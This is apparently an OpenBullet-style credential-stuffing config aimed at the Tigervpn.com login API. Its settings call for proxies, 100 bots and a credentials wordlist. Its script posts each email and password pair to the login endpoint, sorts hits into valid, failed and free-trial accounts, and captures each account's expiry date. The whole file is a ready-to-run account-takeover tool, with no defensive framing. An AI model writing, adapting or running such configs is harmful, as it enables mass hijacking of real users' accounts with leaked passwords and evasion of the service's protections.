[SETTINGS]
{
  "Name": "Tigervpn.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-04T15:52:37.8983498+04:30",
  "AdditionalInfo": "",
  "Author": "\"The_FiendQQ\"",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "Credentials",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://www.tigervpn.com/api/v3/auth/login.json" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "Content-Length: 57" 
  HEADER "Host: www.tigervpn.com" 
  HEADER "Connection: close" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.10.0" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"status\":\"error" 
    KEY "\"message\":\"Username or password incorrect.\"" 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"success" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"is_trial\":true" 

#Expire PARSE "<SOURCE>" JSON "expires_at" CreateEmpty=FALSE -> CAP "Expire" 

